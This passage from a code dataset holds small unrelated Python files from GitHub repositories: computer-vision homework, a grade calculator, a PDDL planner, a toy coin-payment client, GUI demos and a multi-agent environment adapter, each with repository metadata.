1\r\n if fingers == [1, 1, 1, 1, 1]:\r\n playerMove = 2\r\n if fingers == [0, 1, 1, 0, 0]:\r\n playerMove = 3\r\n\r\n randomNumber = np.random.randint(1, 3)\r\n imgAI = cv2.imread(f'Resources/{randomNumber}.png', cv2.IMREAD_UNCHANGED)\r\n imgBG = cvzone.overlayPNG(imgBG, imgAI, (149, 310))\r\n\r\n # Player Wins\r\n if (playerMove == 1 and randomNumber == 3) or \\\r\n (playerMove == 2 and randomNumber == 1) or \\\r\n (playerMove == 3 and randomNumber == 2):\r\n scores[1] += 1\r\n\r\n # AI Wins\r\n if (playerMove == 3 and randomNumber == 1) or \\\r\n (playerMove == 1 and randomNumber == 2) or \\\r\n (playerMove == 2 and randomNumber == 3):\r\n scores[0] += 1\r\n\r\n #putting the camera feed onto the BG image\r\n imgBG[234:654, 795:1195] = imgscaled\r\n\r\n if stateResult:\r\n imgBG = cvzone.overlayPNG(imgBG, imgAI, (149, 310))\r\n cv2.putText(imgBG, str(scores[0]), (410, 215), cv2.FONT_HERSHEY_PLAIN, 4, (255, 255, 255), 6)\r\n cv2.putText(imgBG, str(scores[1]), (1112, 215), cv2.FONT_HERSHEY_PLAIN, 4, (255, 255, 255), 6)\r\n\r\n\r\n # cv2.imshow('image',img)\r\n # cv2.imshow('scaled', imgscaled)\r\n cv2.imshow('imgBG', imgBG)\r\n key = cv2.waitKey(1)\r\n if key == ord('s'):\r\n startGame = True\r\n initialTime = time.time()\r\n stateResult = False","repo_name":"riyazmuthyalapati/OpenCV_Rock_Paper_Sessicor","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"38991672855","text":"#Camryn Moschitta\n#CS175L\n\n#Calculate average and grade with functions\n\n\n\ndef determine_grade(total):\n if total<=100 and total>=90:\n return 'A'\n elif total<=89 and total>=80:\n return 'B'\n elif total<=79 and total>=70:\n return 'C'\n elif total<=69 and total>=60:\n return 'D'\n else:\n return'F'\n\ndef calc_average():\n answer1=float(input(\"Enter score 1: \"))\n answer2=float(input(\"Enter score 2: \"))\n answer3=float(input(\"Enter score 3: \"))\n answer4=float(input(\"Enter score 4: \"))\n answer5=float(input(\"Enter score 5: \"))\n avg=(answer1+answer2+answer3+answer4+answer5)/5\n return answer1, answer2, answer3, answer4, answer5, avg\n\ndef main():\n repeat='yes'\n while repeat=='yes':\n answer1, answer2, answer3, answer4, answer5, avg=calc_average()\n determine_grade(answer1)\n determine_grade(answer2)\n determine_grade(answer3)\n determine_grade(answer4)\n determine_grade(answer5)\n print(f'{\"Score\":<15}',f'{\"Numeric Grade Letter Grade\"}')\n print(\"-------------------------------------------\")\n print(f'{\"Score 1:\":<15}',f'{answer1:<13}',f'{determine_grade(answer1)}')\n print(f'{\"Score 2:\":<15}',f'{answer2:<13}',f'{determine_grade(answer2)}')\n print(f'{\"Score 3:\":<15}',f'{answer3:<13}',f'{determine_grade(answer3)}')\n print(f'{\"Score 4:\":<15}',f'{answer4:<13}',f'{determine_grade(answer4)}')\n print(f'{\"Score 5:\":<15}',f'{answer5:<13}',f'{determine_grade(answer5)}')\n print(f'{\"Average score:\":<15}',f'{avg:<13}',f'{determine_grade(avg)}')\n repeat=input(\"Enter 'yes' if you would like to do another calculation: \")\n\nmain()\n\n","repo_name":"Camrynluna/CS175L-01","sub_path":"Average and Grade.py","file_name":"Average and Grade.py","file_ext":"py","file_size_in_byte":1694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"11755743062","text":"import numpy as np\nfrom exercise_2 import *\nimport PIL\nfrom typing import List\nimport matplotlib.pyplot as plt\n\n###############\n# Problem 3.1 #\n###############\n\ndef return_A_b(vx_N, vt_N, vy_N):\n vx_N = np.reshape(vx_N, (-1, 1))\n vy_N = np.reshape(vy_N, (-1, 1))\n vt_N = np.reshape(vt_N, (-1, 1))\n\n A = np.hstack((vx_N, vy_N))\n return A, vt_N\n\n\ndef setup_equation_2(N: int, height:int, width:int, frame: int,\n Vx: np.ndarray, Vy: np.ndarray, Vt: np.ndarray, \n offset_x: int, offset_y: int) -> List[np.ndarray]:\n \"\"\"\n Args: \n N (int): the size of the cutout\n height (int): the height of the image\n width (int): the width of the image\n frame (int): the frame in the video \n Vx (np.ndarray): the x-gradients\n Vy (np.ndarray): the y-gradients\n Vt (np.ndarray): the time-gradients\n offset_x (int): the starting x of the cutout\n offset_y (int): the starting y of the cutout\n\n Returns:\n The matrix A and vector b in equation (2)\n \"\"\"\n # Generate subsets of Vx, Vy, Vz\n V_x_N = Vx[frame,offset_y: min(offset_y+N,height), offset_x: min(offset_x+N,width)]\n V_y_N = Vy[frame,offset_y: min(offset_y+N,height), offset_x: min(offset_x+N,width)]\n V_t_N = Vt[frame,offset_y: min(offset_y+N,height), offset_x: min(offset_x+N,width)]\n\n # Generate A and b\n\n V_x_N = np.reshape(V_x_N, (-1, 1))\n V_y_N = np.reshape(V_t_N, (-1, 1))\n V_t_N = np.reshape(V_t_N, (-1, 1))\n\n A = np.hstack((V_x_N, V_y_N))\n b = V_t_N\n\n return A, b\n\n\ndef solve_least_squares(A: np.ndarray, b: np.ndarray) -> np.ndarray:\n \"\"\"\n Args:\n A (np.ndarray): the system matrix\n b (np.ndarray): the right hand side\n \n Returns\n The least squares solution to Ax = b\n \"\"\"\n m, c = np.linalg.lstsq(A, b)[0]\n return m, c\n\ndef loop_image(images: np.ndarray, interval: int, N: int):\n depth, height, width = images.shape\n # ensure N is odd.\n if N%2 == 0:\n N +=1\n \n Vt = calculate_Vt_SGF(images) #(64,255,255)\n Vx = calculate_Vx_SGF(images, depth) #(64,255,255)\n Vy = calculate_Vy_SGF(images, depth) #(64,255,255)\n\n print(\"shape vt\" + str(Vt.shape))\n print(\"shape vx\" + str(Vx.shape))\n print(\"shape vy\" + str(Vy.shape))\n\n x_sol = np.zeros((depth,height,width)) \n y_sol = np.zeros((depth,height,width))\n\n for frame in range(depth-1):\n for j in range(N//2, width, interval):\n for k in range(N//2, height, interval):\n #setup_equation_2(N, height, width, frame, Vx, Vy, Vt, x_offset, y_offset)\n V_x_N = Vx[frame,k-N//2: k+N//2+1, j-N//2: j+N//2+1]\n V_y_N = Vy[frame,k-N//2: k+N//2+1, j-N//2: j+N//2+1]\n V_t_N = Vt[frame,k-N//2: k+N//2+1, j-N//2: j+N//2+1]\n print(\"vxN\")\n print(V_x_N.shape)\n A,b = return_A_b(V_x_N, V_t_N, V_y_N)\n print(\"A\")\n print(A.shape)\n print(\"b\")\n print(b.shape)\n print(\"\\n\\n\")\n res1, res2 = solve_least_squares(A, b)\n x_sol[frame, j, k] = res1[0]\n y_sol[frame, j, k] = res2[0]\n \n return x_sol, y_sol\n\n\n# Save images to array\nimages = []\nfor i in range(1, 4):\n num = str(i) if i >= 10 else \"0\" + str(i)\n image = PIL.Image.open(f\"./toyProblem_F22/frame_{num}.png\").convert(\"L\")\n images.append(np.asarray(image, dtype=np.float32)/255)\n\n# Convert list of images to np format\nimages = np.asarray(images)\ndepth, height, width = images.shape\n\n# Vx = calculate_Vx_SGF(images, depth)\n# Vy = calculate_Vy_SGF(images, depth)\n# Vt = calculate_Vt_SGF(images)\n\n# N = 5\n# x_offset = 40\n# y_offset = 40\n# frame = 0\n# A, b = setup_equation_2(N, height, width, frame, Vx, Vy, Vt, x_offset, y_offset)\n\n# print(A.shape)\n# 
print(b.shape)\n# sol1, sol2 = solve_least_squares(A, b)\n# print(\"\\n\\nsol = \" + str(sol1) + \",\" + str(sol2))\n\n# fig, ax = plt.subplots()\n# the_image = ax.imshow(\n# images[frame], cmap=\"gray\"\n# )\n# # X, Y = np.mgrid[]\n# plt.show()\n\n# Problem 3.2\nx, y = loop_image(images, 50, 3)\nprint(x.shape)\nprint(y.shape)\nprint(x[2,:,:])\nprint(y[2,:,:])\n","repo_name":"ElMiho/02526-mathematical-modeling-project-1","sub_path":"code/exercise_3.py","file_name":"exercise_3.py","file_ext":"py","file_size_in_byte":4223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
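One pitfall in setup_equation_2 above: the y-gradient column is built from the time gradients (V_y_N = np.reshape(V_t_N, ...)), so A becomes [Vx Vt] instead of [Vx Vy]. A corrected assembly of the Lucas-Kanade system; note the code above uses b = Vt, while the usual convention negates it:

import numpy as np

def assemble_flow_system(vx_n, vy_n, vt_n):
    # Normal-equation data for A v = b with A = [Vx Vy], b = -Vt.
    A = np.hstack((vx_n.reshape(-1, 1), vy_n.reshape(-1, 1)))
    b = -vt_n.reshape(-1, 1)
    return A, b

# np.linalg.lstsq also warns unless rcond is passed explicitly:
# u, v = np.linalg.lstsq(A, b, rcond=None)[0]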
+{"seq_id":"30838842380","text":"import sys\r\nimport os\r\nassert(len(sys.argv) == 2)\r\n\"\"\"Usage:\r\n python this_file.py 0.2435\r\n\"\"\"\r\n\r\ninteger = \"0.\"\r\nfraction = float(sys.argv[1])\r\n\r\nwhile fraction:\r\n fraction *= 2\r\n integer += str(int(fraction // 1))\r\n fraction -= fraction // 1\r\n print(integer, fraction)\r\n","repo_name":"MingSun-Tse/Scripts","sub_path":"Python/float2bin.py","file_name":"float2bin.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"8441942817","text":"from test2 import worker\nimport multiprocessing\nif __name__ == '__main__':\n manager = multiprocessing.Manager()\n return_dict = manager.dict()\n jobs = []\n temp=[1,2]\n for i in temp:\n p = multiprocessing.Process(target=worker, args=(i,return_dict))\n jobs.append(p)\n p.start()\n for proc in jobs:\n proc.join()\n print(return_dict.values())","repo_name":"Sumitkchoubey/QuestionAnsweringsystem","sub_path":"question_answer/utils/test4.py","file_name":"test4.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"38390780839","text":"import socket\nimport hashlib\nimport random\nimport rsa\nfrom base64 import b64encode, b64decode\nimport urllib\nimport urllib.parse, urllib.request\nimport json\nimport requests\nimport datetime\nfrom Crypto.PublicKey import RSA\nimport binascii\nimport time\nimport sys\n\ndef pause():\n try:\n input('Press enter to continue...')\n except SyntaxError:\n pass\n\ndef bin2hex(binStr):\n return binascii.hexlify(binStr)\n\ndef hex2bin(hexStr):\n return binascii.unhexlify(hexStr)\n\ndef send(txt):\n return s.send(txt.encode('utf-8'))\ndef recv():\n return s.recv(listen_port).decode('utf-8')\n\namnt_to_send = 1 # TODO: This should be chosen by the user!\n\n# FIXME: This is where I would split/combine coins if needed\n\ncheque_amnt, coin_public_key_hex, coin_nonce, coin_private_key_hex = (None, None, None, None,)\nwith open('private_coin_storage.txt', 'r') as f:\n for line in f:\n cheque_amnt, coin_public_key_hex, coin_nonce, coin_private_key_hex = f.readline().rstrip().split('\\t')\n\n if cheque_amnt == amnt_to_send:\n break # We'll use this cheque\n\n# In case we didn't find a coin...\nif cheque_amnt is None:\n print('Coin not found!')\n sys.exit(1)\n\ncheque_str = '_'.join((cheque_amnt, coin_public_key_hex, coin_nonce,))\n\ncoin_private_key = RSA.importKey(hex2bin(coin_private_key_hex))\n\nbank_url = 'http://104.199.121.149:8228'\n\ns = socket.socket()\nhost = '104.199.121.149'\nport = 1247\ns.connect((host, port))\n\nprint('connected')\n\nlisten_port = 1024\n\n# Make sure that I'm connected\nassert recv() == 'awk.init'\nprint('awk.init')\n\n# Make the public key sharable\npublic_key_b64 = b64encode(hex2bin(coin_public_key_hex)).decode('utf-8')\nprint('Share this Base64 public key with the payee: ')\nprint(public_key_b64)\n\n# Announce who I am to the server\nprint('Connecting to server...')\n\n# (Sign the timestamp to verify I own the key)\ntimestamp = str(time.time())\nsignature = b64encode(rsa.sign(timestamp.encode('utf-8'), coin_private_key, 'SHA-256')).decode('utf-8')\n\n# (Send public key along with signed timestamp as proof)\nsend(public_key_b64)\nassert recv() == 'recv.public_key_b64'\n\nsend(timestamp)\nassert recv() == 'recv.timestamp'\n\nsend(signature)\nassert recv() == 'recv.signature'\n\nassert recv() == 'awk.sig'\n\nprint('Connected')\n\nsend('protocol.payer.download_cheque')\nassert recv() == 'awk.protocol.payer.download_cheque'\n\nsend('awk.ready')\n\nencrypted_cheque_str = recv()\n\nif encrypted_cheque_str == 'None':\n print('The payer has not send his/her request yet. Please try again in a few minutes.')\n print('Payment cancelled.')\n print()\n print('Next time, run this command with the -s flag.')\n sys.exit(1)\n\n# Decrypt the cheque\npayee_cheque_str = rsa.decrypt(b64decode(encrypted_cheque_str), coin_private_key).decode('utf-8')\n\n# Sign the cheque\nsignature_b64 = b64encode(rsa.sign(payee_cheque_str.encode('utf-8'), coin_private_key, 'SHA-256')).decode('utf-8')\n\n# Send it to the Bank\nresponse = requests.post(bank_url+'/replace', json={\n 'old_cheque_raw': cheque_str,\n 'new_cheque': payee_cheque_str,\n 'signature_b64': signature_b64\n})\n\nif response.text == 'True':\n print('Payment successful.')\nelse:\n print('Error: ')\n print(response.text)\n","repo_name":"B-Rich/WoodenNickle","sub_path":"send_step2.py","file_name":"send_step2.py","file_ext":"py","file_size_in_byte":3203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"20106334272","text":"from tkinter import *\n\nroot=Tk()\n\nF1=Frame(root,bg='yellow')\n\nL1=Label(F1,text=\"LABEL 1\",fg='green',bg='orange')\nL2=Label(F1,text=\"LABEL 2\",fg='brown',bg='red')\nL3=Label(F1,text=\"LABEL 3\",fg='red',bg='purple')\nL4=Label(F1,text=\"LABEL 4\",fg='blue',bg='pink')\n\nL1.pack()\nL2.pack(fill='x')\nL3.pack(side=LEFT,fill='y')\nL4.pack()\n\nF1.pack()\n\nF2=Frame(root,bg='yellow',bd=100)\n\nL5=Label(root,text=\"LABEL 5\",bd=10,fg='green',bg='orange') #for fill axis label and wigth present on window not fon frame\nL6=Label(root,text=\"LABEL 6\",fg='brown',bg='red')\nL7=Label(root,text=\"LABEL 7\",fg='red',bg='purple')\nL8=Label(root,text=\"LABEL 8\",fg='blue',bg='pink')\n\nL5.pack()\nL6.pack(fill='x')\nL7.pack(side=LEFT,fill='y')\nL8.pack()\n\nF1.pack()\n\nroot.mainloop()\n","repo_name":"PrateekJain999/Python-Codes","sub_path":"GUI/Frame.py","file_name":"Frame.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"3262821172","text":"import matplotlib.pyplot as plt\nimport pandas as pd\n\nplt.rcParams['figure.figsize'] = (20, 10)\n\nfig, axes = plt.subplots(nrows = 2, ncols = 4)\naxes[-1, -1].axis('off')\n\ndf = pd.read_csv(\"data\\world-happiness-report-2021.csv\")\nprint(df.columns)\n\nfeatures = [\"Ladder score\", \"Logged GDP per capita\", \"Social support\", \"Healthy life expectancy\", \"Freedom to make life choices\", \"Generosity\", \"Perceptions of corruption\"]\nxaxes = features\nyaxes = [\"Counts\"] * 7\n\n#flatten array of axes\naxes = axes.ravel()\nfor idx, ax in enumerate(axes[:-1]):\n\tax.hist(df[features[idx]].dropna(), bins = 30)\n\tax.set_xlabel(xaxes[idx], fontsize=20)\n\tax.set_ylabel(yaxes[idx], fontsize=20)\n\tax.tick_params(axis='both', labelsize=15)\n\t\nplt.show()\n\n","repo_name":"Justin-DeTone/data-science_world-happiness","sub_path":"histograms.py","file_name":"histograms.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"14844605407","text":"#!/usr/bin/env python\nfrom pprint import pprint \n\n\nfrom mod_python import apache\n\ndb = apache.import_module('db/redisdb')\n\ndef index(req):\n method = req.method\n \n # Method specific actions\n if method == \"POST\":\n # Extract HTTP form data\n data = req.form\n\n action = data['action']\n object_id = data['id']\n object_type = data['type']\n geo_data = data['data']\n\n # Map object actions \n if action == \"create\":\n db.createObject(id=object_id, \n type=object_type,\n data=geo_data)\n \n elif action == \"delete\":\n db.deleteObject(id=object_id)\n \n \n elif action == \"edit\":\n db.updateObject(id=object_id, \n type=object_type,\n data=geo_data)\n \n return \"POST OK\"\n\n\n elif method == \"GET\":\n response_data = db.getObjects()\n return response_data\n","repo_name":"wilsonc101/R.Pi_Rover","sub_path":"adaptors/offline-mapping/server/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"23357748024","text":"import re\nifin = input('Enter file name:')\nfname = open(ifin)\nregex = input('Input a regular expression to match:\\n')\nilist = list()\nfor line in fname:\n\tline = line.rstrip()\n\ty = re.findall(regex,line)\n\tif len(y) > 0:\n\t\tilist = ilist + y\nprint(ifin,'had',len(ilist),'lines that matched', regex )\n","repo_name":"jbk0th/Using-Python-to-Access-web-Data","sub_path":"Regex_1.py","file_name":"Regex_1.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"18129461244","text":"import numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\nimport helpers\n\nimg = cv2.imread('resources/internal_external.png', 0)\n\nhelpers.implot(img)\n\nimage, cntrs, hierarchy = cv2.findContours(img, cv2.RETR_CCOMP, cv2.CHAIN_APPROX_SIMPLE)\n\next_cons = np.zeros(image.shape)\n\nfor i in range(len(cntrs)):\n if(hierarchy[0][i][3]) == -1: cv2.drawContours(ext_cons, cntrs, i, 255, -1)\n\nhelpers.implot(ext_cons)\n\nint_cons = np.zeros(image.shape)\n\nfor i in range(len(cntrs)):\n if (hierarchy[0][i][3]) != -1: cv2.drawContours(int_cons, cntrs, i, 255, -1)\n\nhelpers.implot(int_cons)\n","repo_name":"zarev/cv-course","sub_path":"cv-course/06-05-contour-detect.py","file_name":"06-05-contour-detect.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"4385000394","text":"from pddl_parser import PddlParser\nimport copy\n\nclass Planner:\n def __init__(self, domain_file_name, problem_file_name):\n # Parser\n self.parser = PddlParser()\n self.parser.parse_domain(domain_file_name)\n self.parser.parse_problem(problem_file_name)\n self.action_state = {} # An\n self.all_possible_actions = []\n self.generate_all_available_actions()\n self.states = {0: set(tuple(state + [0]) for state in self.parser.state)}\n self.g_node = 0\n\n def generate_all_available_actions(self):\n for action in self.parser.actions:\n for possible_act in action.groundify(self.parser.objects):\n self.all_possible_actions.append(possible_act)\n\n @staticmethod\n def applicable(state, precondition):\n return any([set(precondition).issubset(set(item)) for item in state])\n\n def relaxation_plan(self):\n current_state = 0 # S0\n while True:\n temp_state = self.states[current_state].copy()\n possible_actions = set()\n for action in self.all_possible_actions:\n action_flag = True\n pre_cond = action.positive_preconditions\n for precondition in pre_cond:\n if not self.applicable(self.states[current_state], precondition):\n action_flag = False\n break\n if action_flag:\n for precondition in pre_cond:\n # find the precondition in temp_state\n state_from_temp_state = \\\n [item for item in temp_state if set(precondition).issubset(set(item))][0]\n action.weight += state_from_temp_state[len(state_from_temp_state) - 1]\n action.weight += 1\n\n for effect in action.add_effects:\n # check effect exists already in state\n if any([set(effect).issubset(set(item)) for item in temp_state]):\n state_from_temp_state = [item for item in temp_state if set(effect).issubset(set(item))][0]\n if state_from_temp_state[len(state_from_temp_state) - 1] > action.weight:\n temp_state.remove(state_from_temp_state)\n temp_state.add(state_from_temp_state[:len(state_from_temp_state) - 1] +\n (action.weight,))\n else:\n temp_state.add(effect + (action.weight,))\n possible_actions.add(copy.deepcopy(action))\n\n if temp_state == self.states[current_state] or len(possible_actions) == 0:\n break\n else:\n self.action_state[current_state] = possible_actions\n current_state += 1\n self.states[current_state] = temp_state\n self.calculate_g_node(current_state)\n\n if self.g_node == 0:\n print(\"I could not succeed all goals\")\n self.write_actions_states_occurred(current_state)\n\n def calculate_g_node(self, current_state):\n succeeded_goals = ([item for goal in self.parser.positive_goals for item in self.states[current_state] if\n set(goal).issubset(set(item))])\n if len(self.parser.positive_goals) == len(succeeded_goals) and self.g_node == 0:\n for _succeeded_goal in succeeded_goals:\n self.g_node += _succeeded_goal[len(_succeeded_goal) - 1]\n\n def write_actions_states_occurred(self, current_state):\n data = 'Actions and States occurred per level \\n' + '-' * 50 + '\\n'\n for level in range(current_state):\n data += 'At level {} we had {} states and we found {} new actions\\n'.format(\n level, len(self.states[level]), len(self.action_state[level]))\n data += '\\nStates: \\n'\n for state in self.states[level]:\n data += \"%s - Hadd value: %d \\n\" % (', '.join(state[:len(state) - 1]), state[len(state) - 1])\n data += '\\nActions: \\n'\n for action in self.action_state[level]:\n data += action.__str__()\n data += '-' * 100 + '\\n'\n\n # write last level's states\n data += 'At level {} we had {} states\\n'.format(current_state, len(self.states[current_state]))\n data += '\\nStates: \\n'\n for state in 
self.states[current_state]:\n data += \"%s - Hadd value: %d \\n\" % (', '.join(state[:len(state) - 1]), state[len(state) - 1])\n\n data += '\\n' + '-' * 100 + '\\n'\n if self.g_node == 0:\n data += \"We did not find all goals so we did not calculate G node value\"\n else:\n data += \"G node had Hadd value = {}\".format(self.g_node)\n\n with open('results.txt', 'w') as f:\n f.write(data)\n\n\nif __name__ == '__main__':\n domain = \"Depots.pddl\"\n problem = \"pfile1.pddl\"\n planner = Planner(domain, problem)\n planner.relaxation_plan()\n","repo_name":"PPavlidis7/Aida-Planning-and-Scheduling","sub_path":"hw_03/relaxation.py","file_name":"relaxation.py","file_ext":"py","file_size_in_byte":5075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"73869487908","text":"from typing import (\n Any,\n Dict,\n List,\n Mapping,\n Optional,\n Tuple,\n Type,\n TypeVar,\n)\n\nimport gymnasium as gym\n\nfrom .agents import Agent, AgentID\nfrom .env import PhantomEnv\nfrom .policy import Policy\n\n\nObsType = TypeVar(\"ObsType\")\nActType = TypeVar(\"ActType\")\n\n\nclass SingleAgentEnvAdapter(gym.Env):\n \"\"\"\n Wraps a :class:`PhantomEnv` instance or sub-class providing a fully compatible\n :class:`gym.Env` interface, from the perspective of a single agent.\n\n This can be used to test and experiment with Phantom environments using other\n single-agent only frameworks when only one agent is an active learning agent.\n\n Arguments:\n env_class: The :class:`PhantomEnv` class or sub-class to wrap (note: must not be\n an already initialised class instance)\n agent_id: The ID of the agent that the wrapper will explicitly control.\n other_policies: A mapping of all other agent IDs to their policies and policy\n configs. The policies must be fixed/pre-trained policies.\n env_config: Any config options to pass to the underlying env when initialising.\n \"\"\"\n\n def __init__(\n self,\n env_class: Type[PhantomEnv],\n agent_id: AgentID,\n other_policies: Mapping[AgentID, Tuple[Type[Policy], Mapping[str, Any]]],\n env_config: Optional[Mapping[str, Any]] = None,\n ) -> None:\n self._env = env_class(**(env_config or {}))\n\n # Check selected agent exists\n if agent_id not in self._env.agent_ids:\n raise ValueError(\n f\"Selected agent '{agent_id}' of SingleAgentEnvAdapter not found in underlying env '{env_class.__name__}'\"\n )\n\n # Check selected agent isn't given policy\n if agent_id in other_policies:\n raise ValueError(\n f\"Selected agent '{agent_id}' of SingleAgentEnvAdapter found in agent ID to policy mapping\"\n )\n\n # Check all acting agents have assigned policies\n policies = list(other_policies.keys()) + [agent_id]\n\n for agent in self._env.agents.values():\n if agent.action_space is not None and agent.id not in policies:\n raise ValueError(\n f\"Agent '{agent_id}' has not been defined a policy via the 'other_policies' parameter of SingleAgentEnvAdapter\"\n )\n\n self._env.reset()\n\n self._agent_id = agent_id\n\n self._other_policies = {\n agent_id: policy_class(\n self._env[agent_id].observation_space,\n self._env[agent_id].action_space,\n **policy_config,\n )\n for agent_id, (policy_class, policy_config) in other_policies.items()\n }\n\n self._actions: Dict[AgentID, Any] = {}\n self._observations: Dict[AgentID, Any] = {}\n\n super().__init__()\n\n @property\n def active_agent(self) -> AgentID:\n return self._agent_id\n\n @property\n def agents(self) -> Dict[AgentID, Agent]:\n \"\"\"Return a mapping of agent IDs to agents in the environment.\"\"\"\n return self._env.agents\n\n @property\n def agent_ids(self) -> List[AgentID]:\n \"\"\"Return a list of the IDs of the agents in the environment.\"\"\"\n return self._env.agent_ids\n\n @property\n def n_agents(self) -> int:\n \"\"\"Return the number of agents in the environment.\"\"\"\n return self._env.n_agents\n\n @property\n def current_step(self) -> int:\n \"\"\"Return the current step of the environment.\"\"\"\n return self._env.current_step\n\n @property\n def action_space(self) -> gym.Space:\n \"\"\"Return the action space of the selected env agent.\"\"\"\n return self._env[self._agent_id].action_space\n\n @property\n def observation_space(self) -> gym.Space:\n \"\"\"Return the observation space of the selected env agent.\"\"\"\n return 
self._env[self._agent_id].observation_space\n\n def step(self, action: ActType) -> Tuple[ObsType, float, bool, bool, dict]:\n \"\"\"\n Run one timestep of the environment's dynamics.\n\n When end of episode is reached, you are responsible for calling :meth:`reset` to\n reset this environment's state.\n\n Accepts an action and returns a tuple `(observation, reward, terminated, truncated, info)`.\n\n Args:\n action: an action provided by the agent\n\n Returns:\n observation: this will be an element of the environment's\n :attr:`observation_space`. This may, for instance, be a numpy array\n containing the positions and velocities of certain objects.\n reward: The amount of reward returned as a result of taking the action.\n terminated: Whether the agent reaches the terminal state (as defined under\n the MDP of the task) which can be positive or negative. An example is\n reaching the goal state or moving into the lava from the Sutton and\n Barto Gridworld. If true, the user needs to call reset().\n truncated: Whether the truncation condition outside the scope of the MDP is\n satisfied. Typically, this is a timelimit, but could also be used to\n indicate an agent physically going out of bounds. Can be used to end the\n episode prematurely before a terminal state is reached. If true, the\n user needs to call reset().\n info: A dictionary that may contain additional information regarding the\n reason for a ``done`` signal. `info` contains auxiliary diagnostic\n information (helpful for debugging, learning, and logging). This might,\n for instance, contain: metrics that describe the agent's performance\n state, variables that are hidden from observations, information that\n distinguishes truncation and termination or individual reward terms\n that are combined to produce the total reward\n \"\"\"\n\n self._actions = {\n agent_id: policy.compute_action(self._observations[agent_id])\n for agent_id, policy in self._other_policies.items()\n }\n\n self._actions[self._agent_id] = action\n\n step = self._env.step(self._actions)\n\n self._observations = step.observations\n\n return (\n step.observations[self._agent_id],\n step.rewards[self._agent_id],\n step.terminations[self._agent_id],\n step.truncations[self._agent_id],\n step.infos[self._agent_id],\n )\n\n def reset(self) -> Tuple[ObsType, Dict[str, Any]]:\n \"\"\"\n Resets the environment to an initial state and returns an initial observation.\n\n Note that this function should not reset the environment's random number\n generator(s); random variables in the environment's state should be sampled\n independently between multiple calls to `reset()`. In other words, each call of\n `reset()` should yield an environment suitable for a new episode, independent of\n previous episodes.\n\n Returns:\n - The initial observation.\n - A dictionary with auxiliary information, equivalent to the info dictionary\n in `env.step()`.\n \"\"\"\n\n # TODO: update function interface when gym version is updated\n\n self._observations, infos = self._env.reset()\n\n return self._observations[self._agent_id], infos\n","repo_name":"jpmorganchase/Phantom","sub_path":"phantom/env_wrappers.py","file_name":"env_wrappers.py","file_ext":"py","file_size_in_byte":7475,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"71"}
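# A minimal usage sketch for the adapter above; `MyPhantomEnv` and
# `RandomPolicy` are hypothetical placeholders for a concrete PhantomEnv
# sub-class and a fixed Policy sub-class, so this is illustrative only:
#
#     env = SingleAgentEnvAdapter(
#         env_class=MyPhantomEnv,
#         agent_id="a1",
#         other_policies={"a2": (RandomPolicy, {})},
#     )
#     obs, info = env.reset()
#     obs, reward, terminated, truncated, info = env.step(env.action_space.sample())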
+{"seq_id":"34667352685","text":"#### Using keras to preprocess images before feeding into tensorflow model. ###\n\nimport tensorflow as tf\nimport numpy as np\nfrom keras.preprocessing.image import ImageDataGenerator\n\ndef central_crop_images(images, output_height, output_width):\n \"\"\"crop the central part of the images.\n Args:\n images: numpy image data, [N, height, width, channels]\n output_height: The height of the image after preprocessing.\n output_width: The width of the image after preprocessing.\n Returns:\n A cropped images tensor [N, output_height, output_width, channels]\n \"\"\"\n _,H, W,_ = images.shape\n start_idx_H = H//2 - output_height//2\n end_idx_H = H//2 + output_height//2\n start_idx_W = W//2 - output_width//2\n end_idx_W = W//2 + output_width//2\n return images[:,start_idx_H: end_idx_H,start_idx_W: end_idx_W, :]\n\ndef batch_data_generator_train(X, y, batch_size):\n \"\"\" generate a batch of training data and labels, with original dataset.\n Args:\n X: data set [N, height, width, channels]\n y: labels [N, num_classes]\n batch_size: batch size\n \n Returns:\n A batch of transformed data after augmentation [batch_size, height, width, channels]\n \"\"\"\n _, height, width, channels = X.shape\n _, num_classes = y.shape\n datagen = ImageDataGenerator(featurewise_center=False,\n samplewise_center=False,\n featurewise_std_normalization=False,\n samplewise_std_normalization=False,\n zca_whitening=False,\n rotation_range = 360,\n width_shift_range=0.15,\n height_shift_range=0.15,\n shear_range=0.,\n zoom_range=0.,\n channel_shift_range=0.,\n fill_mode=\"nearest\",\n cval=0.,\n horizontal_flip=True,\n vertical_flip=True,\n rescale=None,\n preprocessing_function = None,\n data_format=\"channels_last\")\n return datagen.flow(X, y, batch_size = batch_size)\n \ndef preprocess_for_train_single_image(image, output_height, output_width):\n \"\"\"Preprocesses a single image for training.\n Args:\n image: A `Tensor` [height, width, channels]\n output_height: The height of the image after preprocessing.\n output_width: The width of the image after preprocessing.\n Returns:\n A preprocessed images tensor [batch_size, output_height, output_width, channels]\n \"\"\"\n rank_assertion = tf.Assert(\n tf.equal(tf.rank(image), 3),\n ['Rank of image must be equal to 3.'])\n assert output_height==output_width, 'output_height and output_width must be equal'\n H, W, C = image.get_shape()\n \n # 